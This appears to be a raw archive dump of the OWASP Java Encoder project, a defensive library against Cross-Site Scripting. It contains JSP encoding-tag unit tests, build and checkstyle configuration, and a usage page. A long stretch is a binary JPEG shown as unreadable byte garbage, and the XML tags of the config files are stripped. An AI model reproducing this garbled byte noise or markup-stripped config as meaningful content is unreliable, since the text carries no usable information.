MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForJavaScriptSourceTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptSourceTagTest extends EncodingTagTest { public ForJavaScriptSourceTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForJavaScriptSourceTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForJavaScriptSourceTag instance = new ForJavaScriptSourceTag(); String value = "\0'\""; String expected = "\\x00\\'\\\""; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java000066400000000000000000000023361375203724500314670ustar00rootroot00000000000000/* * To change this template, choose Tools | Templates * and open the template in the editor. */ package org.owasp.encoder.tag; /** * Simple tests for the ForJavaScriptTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptTagTest extends EncodingTagTest { public ForJavaScriptTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForJavaScriptTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForJavaScriptTag instance = new ForJavaScriptTag(); String value = "\0'\""; String expected = "\\x00\\x27\\x22"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java000066400000000000000000000053461375203724500320470ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForUriComponentTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForUriComponentTagTest extends EncodingTagTest { public ForUriComponentTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForUriComponentTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForUriComponentTag instance = new ForUriComponentTag(); String value = "&=test"; String expected = "%26amp%3B%3Dtest"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java000066400000000000000000000052401375203724500301550ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForUriTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForUriTagTest extends EncodingTagTest { public ForUriTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForUriTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForUriTag instance = new ForUriTag(); String value = "\\\""; String expected = "%5C%22"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java000066400000000000000000000053311375203724500320430ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForXmlAttributeTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForXmlAttributeTagTest extends EncodingTagTest { public ForXmlAttributeTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForXmlAttributeTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForXmlAttributeTag instance = new ForXmlAttributeTag(); String value = "
    "; String expected = "<div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java000066400000000000000000000054001375203724500314770ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForXmlCommentTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForXmlCommentTagTest extends EncodingTagTest { public ForXmlCommentTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForXmlCommentTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForXmlCommentTag instance = new ForXmlCommentTag(); String value = "--> 4.0.0 org.owasp.encoder encoder-parent 1.2.3 pom OWASP Java Encoder Project The OWASP Encoders package is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in preventing Web Application security vulnerabilities such as Cross-Site Scripting. core jsp esapi https://www.owasp.org/index.php/OWASP_Java_Encoder_Project 2011 OWASP (Open Web-Application Security Project) https://www.owasp.org/ The BSD 3-Clause License http://www.opensource.org/licenses/BSD-3-Clause repo org.sonatype.oss oss-parent 9 scm:git:git@github.com:owasp/owasp-java-encoder.git scm:git:git@github.com:owasp/owasp-java-encoder.git https://github.com/owasp/owasp-java-encoder gh-pages gh-pages http://owasp.github.io/owasp-java-encoder Owasp-java-encoder-project https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project owasp-java-encoder-project@lists.owasp.org http://lists.owasp.org/pipermail/owasp-java-encoder-project/ github https://github.com/owasp/owasp-java-encoder/issues Jeff Ichnowski Project Owner Architect Developer Jim Manico OWASP https://www.owasp.org/ Architect Developer Jeremy Long jeremy.long@owasp.org OWASP https://www.owasp.org/ developer UTF-8 UTF-8 junit junit 3.8.2 junit junit test org.apache.maven.plugins maven-compiler-plugin 3.5.1 org.apache.maven.plugins maven-jar-plugin 3.0.2 org.apache.maven.plugins maven-source-plugin 3.0.1 org.apache.maven.plugins maven-javadoc-plugin 2.10.4 org.codehaus.mojo cobertura-maven-plugin 2.6 org.apache.maven.plugins maven-failsafe-plugin 2.19.1 org.apache.maven.plugins maven-surefire-plugin 2.19.1 org.apache.maven.plugins maven-surefire-report-plugin 2.19.1 org.apache.maven.plugins maven-gpg-plugin 1.6 org.apache.maven.plugins maven-site-plugin 3.4 lt.velykis.maven.skins reflow-velocity-tools 1.1.1 org.apache.velocity velocity 1.7 org.apache.maven.doxia doxia-module-markdown 1.6 org.apache.maven.plugins maven-project-info-reports-plugin 2.9 org.apache.maven.plugins maven-pmd-plugin 3.6 org.apache.felix maven-bundle-plugin 3.3.0 org.codehaus.mojo versions-maven-plugin 2.3 org.apache.maven.plugins maven-jxr-plugin 2.5 org.codehaus.mojo findbugs-maven-plugin 3.0.4 org.apache.maven.plugins maven-compiler-plugin 1.5 1.5 org.apache.felix maven-bundle-plugin default-bundle process-classes manifest true <_noee>true <_nouses>true org.codehaus.mojo cobertura-maven-plugin 85 85 false 85 85 85 85 clean org.apache.maven.plugins maven-surefire-plugin org/owasp/encoder/BenchmarkTest.java -Xmx1024m -XX:MaxPermSize=256m org.apache.maven.plugins maven-jar-plugin default-jar package jar true ${project.build.outputDirectory}/META-INF/MANIFEST.MF org.apache.maven.plugins maven-source-plugin attach-sources package jar org.apache.maven.plugins maven-javadoc-plugin attach-javadocs package jar org.apache.maven.plugins maven-site-plugin org.apache.maven.plugins maven-project-info-reports-plugin index summary license scm mailing-list issue-tracking dependencies plugin-management project-team org.codehaus.mojo versions-maven-plugin dependency-updates-report plugin-updates-report org.apache.maven.plugins maven-jxr-plugin org.apache.maven.plugins maven-surefire-report-plugin report-only failsafe-report-only org.codehaus.mojo cobertura-maven-plugin org.apache.maven.plugins maven-pmd-plugin 1.5 true utf-8 org.apache.maven.plugins maven-javadoc-plugin default javadoc org.apache.maven.plugins maven-checkstyle-plugin src/main/config/checkstyle.xml src/main/config/checkstyle-header.txt org.codehaus.mojo findbugs-maven-plugin sign-artifacts performRelease true org.apache.maven.plugins maven-gpg-plugin sign-artifacts verify sign owasp-java-encoder-1.2.3/src/000077500000000000000000000000001375203724500160015ustar00rootroot00000000000000owasp-java-encoder-1.2.3/src/main/000077500000000000000000000000001375203724500167255ustar00rootroot00000000000000owasp-java-encoder-1.2.3/src/main/config/000077500000000000000000000000001375203724500201725ustar00rootroot00000000000000owasp-java-encoder-1.2.3/src/main/config/checkstyle-header.txt000066400000000000000000000034301375203724500243170ustar00rootroot00000000000000^// Copyright \(c\) 201[2-9] (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$ ^// All rights reserved\.\s*$ ^// ^// Redistribution and use in source and binary forms, with or without\s*$ ^// modification, are permitted provided that the following conditions\s*$ ^// are met:\s*$ ^//\s*$ ^// \* Redistributions of source code must retain the above\s*$ ^// copyright notice, this list of conditions and the following\s*$ ^// disclaimer\.\s*$ ^// ^// \* Redistributions in binary form must reproduce the above\s*$ ^// copyright notice, this list of conditions and the following\s*$ ^// disclaimer in the documentation and/or other materials\s*$ ^// provided with the distribution.\s*$ ^// ^// \* Neither the name of the OWASP nor the names of its\s*$ ^// contributors may be used to endorse or promote products\s*$ ^// derived from this software without specific prior written\s*$ ^// permission\.\s*$ ^// ^// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\s*$ ^// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\s*$ ^// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\s*$ ^// FOR A PARTICULAR PURPOSE ARE DISCLAIMED\. IN NO EVENT SHALL THE\s*$ ^// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\s*$ ^// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\s*$ ^// \(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\s*$ ^// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION\)\s*$ ^// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\s*$ ^// STRICT LIABILITY, OR TORT \(INCLUDING NEGLIGENCE OR OTHERWISE\)\s*$ ^// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\s*$ ^// OF THE POSSIBILITY OF SUCH DAMAGE\.\s*$ owasp-java-encoder-1.2.3/src/main/config/checkstyle.xml000066400000000000000000000203351375203724500230550ustar00rootroot00000000000000 owasp-java-encoder-1.2.3/src/site/000077500000000000000000000000001375203724500167455ustar00rootroot00000000000000owasp-java-encoder-1.2.3/src/site/markdown/000077500000000000000000000000001375203724500205675ustar00rootroot00000000000000owasp-java-encoder-1.2.3/src/site/markdown/index.md000066400000000000000000000031361375203724500222230ustar00rootroot00000000000000## OWASP Java Encoder Project The OWASP Java Encoder Project is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in preventing Web Application security vulnerabilities such as Cross-Site Scripting (XSS). Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) for more information on preventing XSS. ### Usage In addition to the usage guidance below, more examples can be found on the [OWASP Java Encoder Project Wiki](https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project). The JARs can be found in [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.owasp.encoder%22). ```xml org.owasp.encoder encoder 1.2.2 ``` Utilize the encoder: ```java import org.owasp.encoder.Encode; //... PrintWriter out = ....; out.println(""); ``` ### JSP Usage The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that includes tags and a set of JSP EL functions: ```xml org.owasp.encoder encoder-jsp 1.2.2 ``` ```JSP <%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> <%-- ... --%>

    Dynamic data via EL: ${e:forHtml(param.value)}

    Dynamic data via tag:

    ``` owasp-java-encoder-1.2.3/src/site/resources/000077500000000000000000000000001375203724500207575ustar00rootroot00000000000000owasp-java-encoder-1.2.3/src/site/resources/images/000077500000000000000000000000001375203724500222245ustar00rootroot00000000000000owasp-java-encoder-1.2.3/src/site/resources/images/owasp.jpg000066400000000000000000000263401375203724500240640ustar00rootroot00000000000000ExifII*Duckydhttp://ns.adobe.com/xap/1.0/ Adobedk,      !1A"Qx9aq2B#w8RSVv֗Y3C%&X ?Ɓhhhhhhhhhht݋e;]"nv[ ]Å1ER 0JP@&<٬Q|q")H#IdC ōWME%R$Q0W+ [`?Qg,gUK"":~>!%,ӯ۠Q~o{I7| :wu|*qu/Pno__Hݼvs|/rU͸0νq풵 UZc;Cv% Ջhr i^qaET!$'mx„E_qP (Ho=thhhhhhhh (߷ ;jwn#s2WjNhj,H^]V8P+9lc:,7!;]R-Qߏ-Xψ?g܆H%ƾ>;vRQ7 f{_GXPD bW@mm;+rlpZq6U~~?rqʲtT;Ty&VZ[).57yKR3meNBR9hIa\t^Hn8[}3۾)h4cxk;e7vA{?*B< ar q/MʻHUqk"Fՠܶ %>gB {?:$p&MAg*SD[ۘGVk؋mon]cc-P<סM8!6V?6 yE_,S0(-WnqL^p}} z0SO!Ng# s=[WUWa1m\e, AwfmM5\26tk[&Qj2JT. .g9X5i5>^F-K7ièh*iyݶF2rJ8L[3*01/S *N{^"Sc_Kvce*7j,Kc* 씭;ۨN$d*&\_QQtf<`ns|0f [@MImLcNS26oSΒ(.LwA~;;g qn#tTyAiȊn`*!RhHبܮT"t?fI ;7s2֠^;mXr)/FuL{Vy5y3Ll$~˵UTN!qfxkkΘn$Bl6^`EA -rH^:.^*Aׂy%/uj5%fu*q+@ޯD2|E%( 4_>hO!a<ӎquf"Lh.6kMV*y^}FұN=| 2ȶ cd7 wW+ 8N*`ݠ}eo|zlG~;oޕOa5e*vjS룴"W\,T:yS-W y˷ݿ/yyʷx{k&Pf^F0iqc Q1J$spX%9D!-ƕ|;BnW֖4k.hNmdX!aݽIH@D:`=J# j5$Aޖ딭|-sG%6ZNydJWiه X'E謪,%]IH)(]f{>&V u'tfM6O]CYj6Fmr;J=iBs%HPFo ϭi9<6sDTF`|t(q_huLoQ0W|n2q2/,;j4 rr5z]]Z*IY~Ue9v&9tr)9 kvq@*LZ/CmӆU߱aMہ( fu+myڣ4%"g 0uQ1S#uLLQtӳ9A5xN#oUufakPAL\X"E`:dAًo#mu<,yդb$Y+6z/Wj,n3rxS `nԎ&YPEuTSN+DAw렿V)O *7&d;g[m`zc]2%fnR9lӆRFP$t== 养Mڀܓw*pU8VҚc(QA[?揽o63i~|{ ohi*Z;+8E5U2BN^=chdtĦ;uHGC}mq!fhAo2ECďZhZa0 _h [yى#=H_Pu$.aMCVlA~!^ s\{kFͭ5&s~iY%" :+)9h|<(X\eOdLgi ^bWSk TZLg2N{YS107 a Cl Q3y((T;9bThEg,#$P]9) ئʿANj[Qu 2ijy9z{JfGT%ATXU@@ l#xR?3Z{;\~`uקvR\Bʬqe"4l~w 2_OK?f2?gA2 qݶ~{U?^wNg7m$m-:tX_5AoAK})}xZk My[&'n.ekᣬłہ&)%s3c@VK9ø,2% {+ocՠgn;ɫ<%67Ko+Q1maF,v4#hXRr4)T8B\9UsSZgݱMhόr[7,q6dܲUD|U\9D)VOj[ߕz݉b]?kZ,Δù'>9)"#s P~|vQ n2&H.gl{΄UDBM.6;Hۏp07Y љd9wHGCT2="ɭZMWh&d6Grv܍~d[tFީSJ"!_!Av#}sw}p6 r`q)ƥh6_\k6K1aЬTQNܹ~t9 )@񥲁d1k,,˒4Li9D5u`ǒ&@1z@D-h++s.h'`MHtK{1;jpjT!dCAځ:n&᳔ỄT*ȮYH&"*(ME2+\qb\(} W1Q920Q0th޶9nX*8L$ S|@tgAR2lA♉~l ?'AmS^ᬗA7a5>tNx=giΎQP&;8ʴ]eD ( |I _Af\E>#@=8ƙFu _OOyypD*+9s 4v(_A(&wAM?6V qeI7΄fLpdo"2u/2؇bO ,u$GICm#,R2N7Px Sq y.Za|6l\PQ,J!:q>YV8F$[0L1Ws:7^ZQO_ޗAu>`~@ϓln7aV]&1X6D)zzzY೩lt YӧB/l٘ϫgZ=tzR8&>@t71G@71GAGn*<}aZ%KS27 zBW@!+ *"5h6n(R)~NwƝfMl|kͰyԅ{,jIWҋ;a0be{DP]ڞrU˓v2 uvmY]1n3*ѣ`Ѵ$TS)(4 sSRjFIEKsImhd䌰"k{ii)ްv7L 򬢫q!9]]n-ETDT:s(u}D8_^y|ɗ:y c@2cLNeMl Aet.٢P9C'%6E}??45#>񷇝wlfw!V$JX> c'l/mȗ  \#=RM1^Aעjtʅj= j 1͈D1d܉RGt A˻eR;y7!|mD] 1#}FP`nhGPzUID]OHe;zn`RX'(qMS.H" @A5$E U^$eӖo1sن KtU(vfQfڙ-&ɳ"#)h&Kd\n6ZEX&ٔ%*}wG(2,sE`MMD7~UIFHG 0d퉕( vT@=κ7yB-Ad vfҵyh77^Sh:m{vڶkT|*)j$swz=8t=:@Qr+v܄=Nkcq+f' L]uN=!v/㙲qE)H܎Lb6zw-# BFG1ty',^ܾPFe_i7yJ҉,G'1P}0N='bcH&sB1vт=~}mZzz7/+JI=c˘M9+s*(4ORI+3(lY gHrLtr΅@4ć/:y\Cu\rt"S22b1NL>Pb#%k|rH@QiOc;>BTZ:CR`YnuPHPܡL>: nXxZȗ eFh\#*)*Pfߏy/8?x*ȷM& N ؏0~UR~'ƴ޻bNo͌/>ܾdmRL7dA+'&7Pw :M#+~"R1u:b/3L-`akg'p]3j/Q5MD ]=S8~ UK+,OZtvE^zLHگVvJ5leV3F~"pQR5~$3nj6k>\6Pr*K-'czD@QRRwyAF1vDV͵_2jjQIZNIQ$7=*v.UT)T/Rp'.'b9q8b6s.8iUv$!ejHu ;"v,ᛤ[:*KnVm7+#lw3.:"d71%2وr vm@A)+.* &D"D w?흲>gg3;7Xg0E~`"Jc D:0໖S7Տ,>7y:ҵF4T<|b(Rr,2 cu} 9,ǎ1.0dlCb7;m+,T|IɼIeRH `1C b؞۷ULݶa-8Ul8KPy"Hy! CCAk@4 Aq ~/xJ5(YܬEqFH(^+yÈg{M)0s:/feeKRGsn0Du#JW\~S[gd8Ā 'Q$^C6Ϙs= %bRל{̟_6rʛd;g'] @4<!m20-nhag\͌Bm)vݾܾ)A{[& k[})%115DQ(4Am7!3p:k}*&5gjuhU+r"s^=r?vrU RScKG(ގȹjJckyde/dq)7R'tcfV2'z'P]QP:HM2 HB)@)C(t@ @4 @4 @4 @4 @4 @4 @4 E\t.cnv(Yv&≙6 NnIͶd,\ڴօ3s;YG6M Y]7@,TzR&W;6bFi~;4`Q;!>Y?YT kb`1|Mim_x3z.;nw$᳖QTS:TJ8~a\UeaUpQjƩkrsMt/QUVIDQ3OyŘ[EkIԵ2Yn'֔ף+ͫL16nb6 D_O5apg8|lRj'Vùm#JAU'R(bAB|ɯ: gfĢȶQ8ە l{t@62ɣ~K[lQ)-DLnMPAmt @4 @4 @4 @4 @4 @4 @4 Drg^JUvǫU3S(/ *WIuRa6_Lp폛l N(Hp$H(rؿ."HjdDKbgX@Dк.,aU;#25V;c= ui&ɨF(쐚Ue75M w dB^.^ANggi:%,mBK܇w˘Z3t d&v~ aB37Qm.J -I520S]+w$Q!w,ANga,{QŘʛ]bGa^ôO/)ӕ:c(Ρa hhhhhhhhly:>=4 @4 @4 @4 @4 @4 @4 @4 @4 @4 @4 @4 @4 @4 @4 @4 @4 @owasp-java-encoder-1.2.3/src/site/site.xml000066400000000000000000000066271375203724500204460ustar00rootroot00000000000000 lt.velykis.maven.skins reflow-maven-skin 1.1.1 OWASP Java Encoder Project OWASP Java Encoder Project OWASP Java Encoder Project ./images/owasp.jpg 107 300 default true github ${project.name} https://www.owasp.org/index.php/OWASP_Java_Encoder_Project false top 6 Modules|Maven Documentation Modules Contribute Maven Documentation